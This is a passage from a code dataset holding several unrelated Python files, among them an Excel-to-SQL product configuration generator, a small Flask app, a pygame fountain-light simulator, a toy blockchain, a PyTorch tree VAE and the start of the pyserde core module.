print(sql_content.format(product_id,name,product_code,name,product_type,sub_product_type,product_class,manager_id,support_id),file=output_file)\n\ndef pm_combo_product_cfg(output_file,sheet,start_num,end_num=None):\n '''产品包关系配置 '''\n print('--产品包关系配置\\n')\n if end_num is None:\n end_num = start_num+1 \n del_content = \"DELETE FROM PRODUCT.PM_COMBO_PRODUCT_CFG WHERE COMBO_PRODUCT_ID={} AND RELA_ID='{}';\"\n sql_content = \"INSERT INTO PRODUCT.PM_COMBO_PRODUCT_CFG (COMBO_PRODUCT_ID, RELA_TYPE, RELA_ID, INURE_TIME, EXPIRE_TIME, REFER_TYPE, OPER_MODE, MAX_NUMBER, MIN_NUMBER, CONSTRAINT_RULE) \\nVALUES ({}, 1, '{}', SYSDATE, TO_DATE('3000-01-01 00:00:00', 'YYYY-MM-DD HH24:MI:SS'), 2, 0, -1, 0, null);\"\n for row_index in range(start_num, end_num):\n pkg = int(sheet.cell_value(row_index,1))\n rel = int(sheet.cell_value(row_index,3))\n print(del_content.format(pkg,rel),file=output_file)\n print(sql_content.format(pkg,rel),file=output_file)\n\ndef pm_prod_param_cfg(output_file,sheet,start_num,end_num=None):\n '''开通参数 '''\n print('--开通参数\\n')\n if end_num is None:\n end_num = start_num+1\n def getModify(value):\n if value=='可变更':\n return 1\n else:\n return 0\n def getEmpty(value):\n if value=='可选':\n return 1\n else:\n return 0\n del_content = \"DELETE FROM PRODUCT.PM_PROD_PARAM_CFG WHERE PRODUCT_ID={} AND PARAM_ID='{}';\"\n sql_content = \"INSERT INTO PRODUCT.PM_PROD_PARAM_CFG (PRODUCT_ID, PARAM_TYPE, PARAM_ID, CAN_MODIFY, CAN_EMPTY, CAN_DISPLAY, EFFECT_TYPE, DEFAUL_VALUE, DESCRIPTION, REGEX_VALUE, BOSS_PARAM_TYPE, SEQ_ID, STATUS, KEY_NAME, UNIT_CODE, PARAM_CODE, PLATFORM_SERVICE_ID, SYNC_FLAG, PARAM_VALUE, NAME) VALUES ({}, {}, '{}', {}, {}, 1, 1, null, '{}', null, null, {}, 1, null, null, null, null, null, null, '{}');\"\n tmp_pid=''\n seq=0\n for row_index in range(start_num,end_num):\n product_id = sheet.cell_value(row_index,2)\n if product_id == '':\n product_id = tmp_pid\n seq+=1\n param_type = sheet.cell_value(row_index,15)\n param_id = sheet.cell_value(row_index,3)\n can_modify = getModify(sheet.cell_value(row_index,9))\n can_empty = getEmpty(sheet.cell_value(row_index,8))\n description = sheet.cell_value(row_index,4)\n print(del_content.format(product_id,param_id),file=output_file)\n print(sql_content.format(product_id,param_type,param_id,can_modify,can_empty,description,seq,description),file=output_file)\n\ndef pm_prod_param_opr(output_file,sheet,start_num,end_num=None):\n '''开通操作 '''\n print('--开通操作\\n')\n if end_num is None:\n end_num = start_num+1\n del_content = \"DELETE FROM PRODUCT.PM_PROD_PARAM_OPR WHERE 
PRODUCT_ID={} AND PARAM_ID='{}';\"\n sql_content = \"INSERT INTO PRODUCT.PM_PROD_PARAM_OPR (PRODUCT_ID, PARAM_ID, ORDER_FLAG, CANCEL_FLAG, STOP_FLAG, RESUME_FLAG, RATE_CHANGE_FLAG, CHANGE_FLAG, EXPLORE_FLAG, PREOCCUPY_FLAG, PREOCCUPY_DELAY_FLAG, PREOCCUPY_CANCEL_FLAG, RENEW_FLAG, SYS_STOP_FLAG, SYS_RESUME_FLAG) VALUES ({}, '{}', 2, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1);\"\n tmp_pid=''\n seq=0\n for row_index in range(start_num,end_num):\n product_id = sheet.cell_value(row_index,2)\n if product_id == '':\n product_id = tmp_pid\n seq+=1\n param_id = sheet.cell_value(row_index,3)\n print(del_content.format(product_id,param_id),file=output_file)\n print(sql_content.format(product_id,param_id),file=output_file)\n \ndef pm_product_rule_cfg(output_file,product_id):\n '''自动服开 '''\n print('--自动服开\\n')\n del_content = \"DELETE FROM PRODUCT.PM_PRODUCT_RULE_CFG WHERE PRODUCT_ID={};\"\n sql_content = \"INSERT INTO PRODUCT.PM_PRODUCT_RULE_CFG (RELA_ID, RULE_ID, INURE_TIME, EXPIRE_TIME, TYPE, RELA_TYPE) VALUES ('{}', 10000, SYSDATE, TO_DATE('3000-01-01 00:00:00', 'YYYY-MM-DD HH24:MI:SS'), 3, 1);\"\n print(del_content.format(product_id),file=output_file)\n print(sql_content.format(product_id),file=output_file)\n return '1'\n\ndef pm_product_process_cfg(output_file,product_id):\n '''自动归档 '''\n print('--自动归档\\n')\n del_content = \"DELETE FROM PRODUCT.PM_PRODUCT_PROCESS_CFG WHERE PRODUCT_ID={};\"\n sql_content = \"INSERT INTO PRODUCT.PM_PRODUCT_PROCESS_CFG (SERVICE_TYPE, PRODUCT_ID, OPR_CODE, FLOW_DEFINE_ID, PRIORITY) VALUES ('0', {}, 0, '0', 10);\"\n print(del_content.format(product_id),file=output_file)\n print(sql_content.format(product_id),file=output_file)\n return '1'\n\ndef pm_product_attr_cfg(output_file,sheet,start_num,end_num=None):\n '''产品属性 '''\n print('--产品属性\\n')\n if end_num is None:\n end_num = start_num+1\n del_content = \"DELETE FROM PRODUCT.PM_PRODUCT_ATTR_CFG WHERE PRODUCT_ID={};\"\n sql_content = \"INSERT INTO PRODUCT.PM_PRODUCT_ATTR_CFG (PRODUCT_ID, IS_REPEAT, IS_COOPER, IS_BBOSS, IS_PBOSS, IS_DIVIDED, HAS_ADDITIONAL, HAS_MEMBER, IS_ANONYMOUS, IS_SUPPORT_RENEW, IS_INDEPENDENT, APPLY_CYCLE, MIN_APPLY_UNIT, MAX_APPLY_UNIT, REFUND_THRESHOLD, MIN_BALANCE, IS_TEAMWORK, AUTO_SERVICEOPEN, AUTO_ARCHIVE, IS_TEST, IS_FREE_SOURCE) \\nVALUES ({}, {}, 0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 1, -1, 0, 0, 0, {}, {}, 0, null);\"\n for row_index in range(start_num,end_num):\n product_id = sheet.cell_value(row_index,1)\n is_repeat = '1' if sheet.cell_value(row_index,13) == '是' else '0'\n auto_serviceopen = '0' if sheet.cell_value(row_index,19) != '是' else pm_product_rule_cfg(output_file,product_id)\n auto_archive = '0' if sheet.cell_value(row_index,20) != '是' else pm_product_process_cfg(output_file,product_id)\n print(del_content.format(product_id),file=output_file)\n print(sql_content.format(product_id,is_repeat,auto_serviceopen,auto_archive),file=output_file)\n\n\nchannel = {'政企ESOP': {'20'},\n '北京': {'100'},\n '广东': {'200'},\n '上海': {'210'},\n '天津': {'220'},\n '重庆': {'230'},\n '辽宁': {'240'},\n '江苏': {'250'},\n '湖北': {'270'},\n '四川': {'280'},\n '陕西': {'290'},\n '河北': {'311'},\n '山西': {'351'},\n '河南': {'371'},\n '吉林': {'431'},\n '黑龙江': {'451'},\n '内蒙古': {'471'},\n '山东': {'531'},\n '安徽': {'551'},\n '浙江': {'571'},\n '福建': {'591'},\n '台湾': {'710'},\n '湖南': {'731'},\n '广西': {'771'},\n '江西': {'791'},\n '香港': {'810'},\n '澳门': {'820'},\n '贵州': {'851'},\n '云南': {'871'},\n '西藏': {'891'},\n '海南': {'898'},\n '甘肃': {'931'},\n '宁夏': {'951'},\n '青海': {'971'},\n '新疆': {'991'},\n 'BBSS': {'998'},\n '31省': 
{'100','200','210','220','230','240','250','270','280','290','311','351','371','431','451','471','531','551','571','591','731','771','791','851','871','891','898','931','951','971','991'}}\nimport re\ndef pm_product_channel_cfg(output_file,sheet,start_num,end_num=None):\n '''产品渠道 '''\n print('--产品渠道\\n')\n if end_num is None:\n end_num = start_num+1\n del_content = \"DELETE FROM PRODUCT.PM_PRODUCT_CHANNEL_CFG WHERE PRODUCT_ID={} AND CHANNEL_ID = {} AND OPR_CODE = '{}' AND EFFT_TYPE = '{}';\"\n sql_content = \"INSERT INTO PRODUCT.PM_PRODUCT_CHANNEL_CFG (PRODUCT_ID,CHANNEL_ID,INURE_TIME,EXPIRE_TIME,OPR_CODE,EFFT_TYPE) VALUES ({}, '{}', SYSDATE, TO_DATE('01-01-3000', 'DD-MM-YYYY'), {}, {});\"\n for row_index in range(start_num,end_num):\n product_id = sheet.cell_value(row_index,2)\n channelIds = sheet.cell_value(row_index,3)\n oprTypes=[]\n if sheet.cell_value(row_index,5)=='Y':oprTypes.append('7')#资源勘查\n if sheet.cell_value(row_index,6)=='Y':oprTypes.append('8')#资源预占\n if sheet.cell_value(row_index,7)=='Y':oprTypes.append('9')#预占延期\n if sheet.cell_value(row_index,8)=='Y':oprTypes.append('10')#预占取消\n if sheet.cell_value(row_index,9)=='Y':oprTypes.append('1')#产品开通\n if sheet.cell_value(row_index,10)=='Y':oprTypes.append('5')#资费变更\n if sheet.cell_value(row_index,11)=='Y':oprTypes.append('6')#资源变更\n if sheet.cell_value(row_index,12)=='Y':oprTypes.append('23')#产品续订\n if sheet.cell_value(row_index,13)=='Y':oprTypes.append('3')#业务暂停\n if sheet.cell_value(row_index,14)=='Y':oprTypes.append('4')#业务恢复\n if sheet.cell_value(row_index,15)=='Y':oprTypes.append('2')#业务注销\n if sheet.cell_value(row_index,16)=='Y':oprTypes.append('25')#成员管理\n if sheet.cell_value(row_index,17)=='Y':oprTypes.append('44')#密码重置\n if sheet.cell_value(row_index,18)=='Y':oprTypes.append('11')#系统暂停\n if sheet.cell_value(row_index,19)=='Y':oprTypes.append('')#产品审批\n if sheet.cell_value(row_index,20)=='Y':oprTypes.append('12')#系统恢复\n if sheet.cell_value(row_index,21)=='Y':oprTypes.append('')#免费资源延期\n if sheet.cell_value(row_index,22)=='Y':oprTypes.append('')#申请退货\n pattern = re.compile(r'、')\n for channelId in re.split(pattern,channelIds):\n for channel_id in channel[channelId]:\n for oprType in oprTypes:\n print()\n\n\n\n\n\ntimestamp = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')\nexcel = xlrd.open_workbook(r'D:\\Workspaces\\SVN\\EBOSS\\trunk\\01_需求分析\\02-产品需求\\政企EBOSS产品树.xlsx')\nprint_file = r'D:/Workspaces/{}.sql'.format(timestamp)\nwith open(print_file, encoding='utf8', mode='a') as a_file:\n # sheet = excel.sheet_by_index(3)\n sheet = excel.sheet_by_name(u'产品树')\n pm_product_tree_node_cfg(print_file,sheet,5)\n # pm_product_def(a_file,sheet,1,12)\n \n","sub_path":"python/product/produce.py","file_name":"produce.py","file_ext":"py","file_size_in_byte":13577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"201738747","text":"from flask import Flask, request, jsonify\nfrom _datetime import datetime\n\napp = Flask(__name__)\n\n@app.route('/')\ndef hello() :\n \n print(datetime)\n return \"hello world\"\n\n@app.route('/jsontest', methods = ['POST'])\ndef getJson() :\n requestData = request.get_json()\n return jsonify(requestData)\n\n\nif __name__ == \"__main__\" :\n app.run(host='localhost',port='0000')\n\n\n","sub_path":"Projrct1/AppRoute.py","file_name":"AppRoute.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"303912189","text":"from tikidb_config import 
read_db_config\nfrom mysql.connector import MySQLConnection, Error\nimport sys\n\n\ndef insert_data(data):\n\tquery = \"INSERT INTO products(id,brand,category,price,title,review,rating,image_link,product_link,from_page_link)\"\\\n\t\t\"VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n\targs = [str(item) for item in data]\n\tconn = None\n\tcursor = None\n\ttry:\n\t\tdb_config = read_db_config()\n\t\tconn = MySQLConnection(**db_config)\n\t\tcursor = conn.cursor()\n\t\tcursor.execute(query, args)\n\t\tconn.commit()\n\texcept Error as error:\n\t\tprint(error)\n\t\tprint(db_config)\n\t\tsys.exit(1)\n\tfinally:\n\t\tif cursor is not None:\n\t\t\tcursor.close()\n\t\tif conn is not None:\n\t\t\tconn.close()\n\n\n","sub_path":"insert_tikidb.py","file_name":"insert_tikidb.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"440439358","text":"\nimport sys, pygame, random, math, threading\nrandom.seed()\npygame.init()\npygame.font.init()\nfrom pygame.locals import *\n\nc_green = 0,255,0\nc_red = 255,0,0\nc_blue = 0,0,255\nc_white = 255,255,255\nc_black = 0,0,0\nc_darkgrey = 20,20,20\nc_lightgrey = 150,150,150\n\npos=[100,100]\nradius_array = [30,40,30,30,30,40,50,50,40,40,40]\nsize = width,height = 950,950\ncenter = width/2,height/2\npygame.display.set_caption(\"Fountain Simulation\")\nscreen = pygame.display.set_mode(size)\nscreen.fill(c_black)\nfont = pygame.font.SysFont(\"Arial\", 10)\n \nshowRings = False\nshowNumb = False\n\nlight_list = []\n\nclass Group:\n def __init__(self, sort, contents):\n self.contents = contents\n self.sort = sort\n if sort:\n self.contents = sorted(contents)\n\n def __getitem__(self, index):\n return self.contents[index]\n\n def __str__(self):\n return str(self.contents)\n \n def __repr__(self):\n return str(self.contents)\n\n def append(self, item):\n self.contents.append(item)\n \n def set_color(self, color):\n for light in self.contents:\n light.set_color(color)\n def length(self):\n return len(self.contents)\n \n @staticmethod\n def groupify (*args):\n l = list(args)\n return Group(False, l)\n\n @staticmethod \n def merge (sort, *args):\n l = []\n for arg in args:\n l.extend(arg.contents)\n return Group(sort, l)\n\nclass Light:\n def __init__(self, pos, radius, id_code, universe, real_id, color = c_lightgrey):\n self.color = color\n self.pos = pos\n self.radius = radius\n self.id_code = id_code\n self.universe = universe\n self.real_id = real_id\n\n def __lt__(self, other):\n return self.id_code < other.id_code\n\n def __str__(self):\n return str(self.id_code)\n\n def __repr__(self):\n return str(self.id_code)\n\n def set_color(self, color):\n self.color = color\n self.draw()\n #hayg.set_light(self.universe,(self.real_id*(3-2)),(self.real_id(3-1)),(self.real_id(3-0)),color[0],color[1],color[2]) \n def off(self):\n self.set_color(c_lightgrey)\n\n def draw(self):\n pygame.draw.circle(screen, self.color, self.pos, self.radius)\n if showNumb:\n local_label = font.render(str(self.id_code), 1, c_white)\n screen.blit(local_label, (self.pos[0],self.pos[1]))\n #real_label = font.render(str(self.real_id), 1, c_white)\n #screen.blit(real_label, (self.pos[0]-10,self.pos[1]-10))\n\ndef draw_rings(ring_thickness, number_of_rings, radius_array):\n for ring_numb in reversed(range (0,number_of_rings)):\n pygame.draw.circle(screen, c_darkgrey, center, radius_array[ring_numb]+ring_thickness)\n pygame.draw.circle(screen, c_black, center, radius_array[ring_numb])\n\n\ndef compute_lights(number_of_rings, ring_thickness, light_radius, radius_array):\n global
light_list\n\n ring_zero_difference = (107-103, 162 ,3)\n ring_one_difference = (102-87, 175.5 ,3)\n ring_two_difference = (124-109, 198, 2)\n ring_three_difference = (86-71, 175.5, 3)\n ring_four_difference = (70-55, 198, 3)\n ring_five_difference = (108-65, 210.7, 2)\n ring_six_difference = (54-1, 210, 3)\n ring_seven_difference = (64-1, 209, 2)\n ring_eight_difference = (118-53, 209, 1)\n ring_nine_difference = (52-25, 145.6, 1, 60.0, 12/4, 7)\n ring_ten_difference = (24-17, 137.72, 1, 84.48, 65.45/4, 2) \n ring_array = [ring_zero_difference, ring_one_difference, ring_two_difference, ring_three_difference, ring_four_difference, ring_five_difference, ring_six_difference, ring_seven_difference, ring_eight_difference, ring_nine_difference, ring_ten_difference]\n light_id = 0\n count3 = 107\n count2 = 124\n count1 = 118\n\n for ring_number in range(number_of_rings):\n number_of_lights = ring_array[ring_number][0]+ 1\n acc_angle = 0\n for light_number in range (number_of_lights):\n if ring_number > 8:\n radians = -math.radians(360.0*light_number/(ring_array[ring_number][0]*ring_array[ring_number][4])) + math.radians(ring_array[ring_number][1])\n if light_number%ring_array[ring_number][5] == 0 and light_number != 0:\n acc_angle += math.radians(ring_array[ring_number][3] - (360.0/(ring_array[ring_number][0]*ring_array[ring_number][4])))\n x = (ring_thickness/2 + radius_array[ring_number])*math.cos(radians-acc_angle) + center[0]\n y = (ring_thickness/2 + radius_array[ring_number])*math.sin(radians-acc_angle) + center[1]\n else:\n radians = -math.radians(360.0*light_number/number_of_lights) + math.radians(ring_array[ring_number][1])\n x = (ring_thickness/2 + radius_array[ring_number])*math.cos(radians) + center[0]\n y = (ring_thickness/2 + radius_array[ring_number])*math.sin(radians) + center[1]\n uni_number = ring_array[ring_number][2]\n if uni_number == 3:\n light_list.append(Light((int(x),int(y)), light_radius, light_id, uni_number, count3))\n count3 -= 1\n elif uni_number == 2:\n light_list.append(Light((int(x),int(y)), light_radius, light_id, uni_number, count2))\n count2 -= 1\n else:\n light_list.append(Light((int(x),int(y)), light_radius, light_id, uni_number, count1))\n count1 -= 1\n\n light_id += 1\n\ndef draw_lights():\n for i in range (len(light_list)):\n light = light_list[i]\n light.draw()\n\ndef draw_diagram(ring_thickness, number_of_rings, light_radius, radius_array):\n for i in range(1,number_of_rings):\n radius_array[i] += radius_array[i-1] \n if showRings:\n draw_rings(ring_thickness, number_of_rings, radius_array)\n\n compute_lights(number_of_rings, ring_thickness, light_radius, radius_array)\n draw_lights()\n\ndef flush_pygame():\n pygame.display.flip()\n\n\"\"\"\ndef flush():\n for i in range(1,4)\n hayg.flush(i)\n\"\"\"\n \ndef init(should_show_ring, should_show_numb):\n global showRings, showNumb\n\n if should_show_ring:\n showRings = True\n if should_show_numb:\n showNumb = True\n draw_diagram(10,len(radius_array),8,radius_array)\n t = threading.Thread(target=keep_run)\n t.start()\n pygame.display.flip()\n\ndef keep_run():\n cont = True\n while cont:\n for event in pygame.event.get():\n if event.type == pygame.QUIT: cont = False;\n pygame.quit()\n\n","sub_path":"simulator_coredumper.py","file_name":"simulator_coredumper.py","file_ext":"py","file_size_in_byte":6571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"4078294","text":"class Node:\n def __init__(self, value):\n self.value = value\n self.next = 
None\n\nimport hashlib\n\nclass Block:\n\n def __init__(self, timestamp, data, previous_hash):\n self.timestamp = timestamp\n self.data = data\n self.previous_hash = previous_hash\n self.hash = self.calc_hash(data)\n\n def calc_hash(self, data):\n sha = hashlib.sha256()\n hash_str = data.encode('utf-8')\n sha.update(hash_str)\n return sha.hexdigest()\n \n def update(self, timestamp, new_data):\n self.timestamp = timestamp\n self.data = new_data\n self.hash = self.calc_hash(new_data)\n \n def __repr__(self):\n return \"[Timestamp: {}, Data: {}, PrevHash: {}, Hash:{}]\".format(self.timestamp, self.data, self.previous_hash, self.hash)\n\nimport datetime \n\ntimestamp = datetime.datetime.now(datetime.timezone.utc).strftime(\"%H:%M %m/%d/%Y %Z\")\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n self.tail = None\n \n def get_node(self, value, prev_hash=None):\n block = Block(timestamp, value, prev_hash)\n return Node(block)\n \n def add(self, value):\n if not value:\n return 'Can\\'t add block without any data!'\n\n if self.head is None:\n self.head = self.get_node(value)\n self.tail = self.head \n return self.head.value.hash\n \n tail = self.tail\n tail.next = self.get_node(value, tail.value.hash)\n self.tail = tail.next\n\n return tail.next.value\n \n def get_latest(self):\n if self.head is None:\n return 'No record'\n \n tail = self.head\n while tail.next:\n tail = tail.next\n return tail.value.data\n \n def update(self, hash, new_data):\n tail = self.head\n while tail:\n if tail.value.hash == hash:\n tail.value.update(timestamp, new_data)\n return tail.value.data\n tail = tail.next\n return 'No record'\n \n def is_chain_valid(self):\n if self.head is None:\n return 'No record found'\n tail = self.head\n while tail.next:\n if tail.value.hash != tail.next.value.previous_hash:\n return False\n tail = tail.next\n \n return True\n\n def __str__(self):\n if self.head is None:\n return 'Blockchain empty!'\n cur_head = self.head\n out_string = \"\"\n while cur_head:\n out_string += str(cur_head.value.data) + \" -> \"\n cur_head = cur_head.next\n return out_string \n\n# Test case 1\n\nblockchain = LinkedList()\nprint(blockchain.add('data1'))\nprint(blockchain.add('data2'))\nprint(blockchain.add('data3'))\nprint(blockchain.add('data4'))\nprint('Blockchain : ', blockchain) # Expected: data1 -> data2 -> data3 -> data4 ->\nprint(blockchain.get_latest()) # Expected: data4\nprint(blockchain.is_chain_valid()) # Expected: True\n\n# Test case 2\n\nblockchain = LinkedList()\nprint(blockchain.add('input1'))\nprint(blockchain.add('input2'))\nprint(blockchain.add('input3'))\nprint('Blockchain : ', blockchain) # Expected: input1 -> input2 -> input3 ->\nprint(blockchain.is_chain_valid()) # Expected: True\nblockchain.update('124d8541ff3d7a18b95432bdfbecd86816b86c8265bff44ef629765afb25f06b', 'ZZZZ')\nprint('Blockchain : ', blockchain) # Expected: input1 -> ZZZZ -> input3 ->\nprint(blockchain.is_chain_valid()) # Expected: False\n\n# Test case 3\n\nblockchain = LinkedList()\nprint(blockchain.add('')) # Expected: Can't add block without any data!\nprint(blockchain.add(None)) # Expected: Can't add block without any data!\nprint(blockchain.add('input3')) # Expected: \n\n# Test case 4\n\nblockchain = LinkedList()\nprint(blockchain) # Expected: Blockchain empty!\n","sub_path":"problem_5.py","file_name":"problem_5.py","file_ext":"py","file_size_in_byte":3836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"358086150","text":"import torch\nfrom torch 
import nn\nfrom torch.nn import functional as F\nimport numpy as np\nfrom globals import device\n\nclass MLP(nn.Module):\n def __init__(self, ind, hdim, odim):\n super(MLP, self).__init__()\n self.l1 = nn.Linear(ind, hdim)\n self.l2 = nn.Linear(hdim, hdim)\n self.l3 = nn.Linear(hdim, odim)\n\n def forward(self, x):\n x = torch.tanh(self.l1(x))\n x = torch.tanh(self.l2(x))\n return self.l3(x)\n\n# VAE for trees represented as dicts with \"value\", \"left\", and \"right\" keys\nclass VAE(nn.Module):\n def __init__(self, hidden_dim, latent_dim, vocab_size, max_len):\n super(VAE, self).__init__()\n\n self.hidden_dim = hidden_dim\n self.latent_dim = latent_dim\n self.vocab_size = vocab_size\n self.max_len = max_len\n\n self.log_sigma = torch.nn.Parameter(torch.full((1,), 0.0)[0], requires_grad=True)\n\n # encoding\n self.embed = nn.Embedding(self.vocab_size, hidden_dim)\n # self.encode_union = MLP(3*hidden_dim, hidden_dim, hidden_dim)\n # self.encode_intersect = MLP(3*hidden_dim, hidden_dim, hidden_dim)\n # self.encode_subtract = MLP(3*hidden_dim, hidden_dim, hidden_dim)\n # self.encode_mu = MLP(hidden_dim, hidden_dim, latent_dim)\n # self.encode_logvar = MLP(hidden_dim, hidden_dim, latent_dim)\n #\n # # decoding\n # self.node_type = MLP(latent_dim, hidden_dim, self.vocab_size)\n # self.decode_union = MLP(latent_dim, hidden_dim, 2*latent_dim)\n # self.decode_intersect = MLP(latent_dim, hidden_dim, 2*latent_dim)\n # self.decode_subtract = MLP(latent_dim, hidden_dim, 2*latent_dim)\n self.encode_union = nn.Linear(2*hidden_dim, hidden_dim)\n self.encode_intersect = nn.Linear(2*hidden_dim, hidden_dim)\n self.encode_subtract = nn.Linear(2*hidden_dim, hidden_dim)\n self.encode_mu = nn.Linear(hidden_dim, latent_dim)\n self.encode_logvar = nn.Linear(hidden_dim, latent_dim)\n\n # decoding\n self.node_type = nn.Linear(latent_dim, self.vocab_size)\n self.decode_union = nn.Linear(latent_dim, 2*latent_dim)\n self.decode_intersect = nn.Linear(latent_dim, 2*latent_dim)\n self.decode_subtract = nn.Linear(latent_dim, 2*latent_dim)\n\n def encode(self, tree):\n def traverse(node):\n # leaf\n if node[\"right\"] is None and node[\"left\"] is None:\n return torch.tanh(self.embed(node[\"value\"]))\n # internal\n else:\n lchild = traverse(node[\"left\"])\n rchild = traverse(node[\"right\"])\n input = torch.cat([lchild, rchild], 0)\n if node[\"value\"] == 396:\n return torch.tanh(self.encode_union(input))\n elif node[\"value\"] == 397:\n return torch.tanh(self.encode_intersect(input))\n elif node[\"value\"] == 398:\n return torch.tanh(self.encode_subtract(input))\n else:\n assert(False)\n\n h = traverse(tree)\n return self.encode_mu(h), self.encode_logvar(h)\n\n def reparameterize(self, mu, logvar):\n std = torch.exp(0.5*logvar)\n eps = torch.randn_like(std)\n return mu + eps*std\n\n def decode(self, z, tree=None):\n # returns decoded tree and a list of predicted node types\n # (for training node_type classifier), teacher forces tree structure\n def traverse_train(node, code):\n # leaf\n if node[\"right\"] is None and node[\"left\"] is None:\n return {\"value\": self.node_type(code), \"left\": None, \"right\": None}\n # internal\n else:\n if node[\"value\"] == 396:\n par_out = torch.tanh(self.decode_union(code))\n elif node[\"value\"] == 397:\n par_out = torch.tanh(self.decode_intersect(code))\n elif node[\"value\"] == 398:\n par_out = torch.tanh(self.decode_subtract(code))\n else:\n assert(False)\n lchild = traverse_train(node[\"left\"], par_out[:self.latent_dim])\n rchild = traverse_train(node[\"right\"],
par_out[self.latent_dim:])\n return {\"value\": self.node_type(code), \"left\": lchild, \"right\": rchild}\n\n # returns decoded tree given just a latent code at test time\n def traverse_test(code, max_depth):\n type = self.node_type(code)\n token = torch.argmax(type)\n # leaf\n if token < 396 or max_depth == 1:\n zeroed_type = type\n zeroed_type[396:] = 0\n return {\"value\": zeroed_type, \"left\": None, \"right\": None}\n # internal\n else:\n if token == 396:\n par_out = torch.tanh(self.decode_union(code))\n elif token == 397:\n par_out = torch.tanh(self.decode_intersect(code))\n elif token == 398:\n par_out = torch.tanh(self.decode_subtract(code))\n else:\n assert(False)\n lchild = traverse_test(par_out[:self.latent_dim], max_depth - 1)\n rchild = traverse_test(par_out[self.latent_dim:], max_depth - 1)\n return {\"value\": type, \"left\": lchild, \"right\": rchild}\n\n if tree is not None:\n return traverse_train(tree, z)\n else:\n # depth of 7 is enough to generate max_len=13 programs\n # todo: don't hardcode this\n return traverse_test(z, 7)\n\n def forward(self, x):\n mu, logvar = self.encode(x)\n z = self.reparameterize(mu, logvar)\n return self.decode(z, x), mu, logvar\n\n # Reconstruction + KL divergence losses\n def loss_function(self, recon_x, x, mu, logvar, beta):\n # returns flattened tree and target node types\n def flatten(node):\n if node[\"right\"] is None and node[\"left\"] is None:\n return [node[\"value\"]]\n else:\n lchild = flatten(node[\"left\"])\n rchild = flatten(node[\"right\"])\n return [node[\"value\"]] + lchild + rchild\n\n flat_x = flatten(x)\n flat_recon_x = flatten(recon_x)\n # print(torch.stack(flat_x))\n # print(torch.argmax(torch.stack(flat_recon_x), dim=1))\n\n CE = F.cross_entropy(torch.stack(flat_recon_x), torch.stack(flat_x), reduction='sum')\n #CE = gaussian_nll(torch.stack(flat_recon_x), softclip(self.log_sigma, -6), F.one_hot(torch.stack(flat_x), 399)).sum()\n\n # see Appendix B from VAE paper:\n # Kingma and Welling. Auto-Encoding Variational Bayes. 
ICLR, 2014\n # https://arxiv.org/abs/1312.6114\n # 0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)\n KLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n\n # KLD *= .01\n # print(CE/KLD)\n return CE + beta * KLD, CE, KLD\n\ndef gaussian_nll(mu, log_sigma, x):\n return 0.5 * torch.pow((x - mu) / log_sigma.exp(), 2) + log_sigma + 0.5 * np.log(2 * np.pi)\n\ndef softclip(tensor, min):\n result_tensor = min + F.softplus(tensor - min)\n\n return result_tensor\n","sub_path":"old/vae_tree_reduced.py","file_name":"vae_tree_reduced.py","file_ext":"py","file_size_in_byte":7224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"298288274","text":"# 好题!!用时40分钟\r\nclass Solution(object):\r\n def checkPossibility(self, nums):\r\n \"\"\"\r\n :type nums: List[int]\r\n :rtype: bool\r\n \"\"\"\r\n length = len(nums)\r\n if length <= 1:\r\n return True \r\n change = -1\r\n change_prev = -1\r\n for i in range(1, length - 1):\r\n a, b, c = nums[i - 1], nums[i], nums[i + 1]\r\n if a <= b <= c:\r\n continue\r\n elif b >= a and b >= c:\r\n if a <= c:\r\n change = i + 0.5 # b decrese or c increase\r\n else: # a > c\r\n change = i + 1 # c increase\r\n elif b <= a and b <= c:\r\n if a <= c:\r\n change = i - 0.5 # b increase or a decrease\r\n else:\r\n change = i - 1 # a decrease\r\n else: # a > b > c\r\n return False\r\n # print(i, change)\r\n if change_prev >= 0:\r\n # x.5 means interval [x, x + 1]\r\n diff = abs(change_prev - change)\r\n if diff > 1: # change at least two \r\n return False\r\n elif diff == 1:\r\n if int(change) == change:\r\n return False\r\n else:\r\n change_prev = int(max(change, change_prev))\r\n # if both of them are interval: changable, choose the intersection\r\n else:\r\n change_prev = change\r\n # print(change)\r\n return True\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n # inputs\r\n nums = [4,2,3,4,5,6]\r\n # nums = [4,2,3]\r\n nums = [4,2,1]\r\n # nums = [3,4,2,3]\r\n nums = [1,5,4,6,7,8,9] # true\r\n nums = [-1,4,2,3]\r\n print('-' * 30)\r\n res = Solution().checkPossibility(nums)\r\n print(res)","sub_path":"665_checkPossibility.py","file_name":"665_checkPossibility.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"84122552","text":"\"\"\"\npyserde core module.\n\"\"\"\nimport dataclasses\nimport logging\nfrom dataclasses import dataclass, field, is_dataclass\nfrom typing import Any, Callable, Dict, Iterator, List, Optional, Type, TypeVar\n\nimport stringcase\n\nfrom .compat import T, assert_type, is_dict, is_list, is_opt, is_tuple, is_union, type_args\n\n__all__: List = []\n\nlogger = logging.getLogger('serde')\n\nJsonValue = TypeVar('JsonValue', str, int, float, bool, Dict, List)\n\nFROM_ITER = '__serde_from_iter__'\n\nFROM_DICT = '__serde_from_dict__'\n\nTO_ITER = '__serde_to_iter__'\n\nTO_DICT = '__serde_to_dict__'\n\nHIDDEN_NAME = '__serde_hidden__'\n\nSETTINGS = dict(debug=False)\n\n\n@dataclass\nclass Hidden:\n 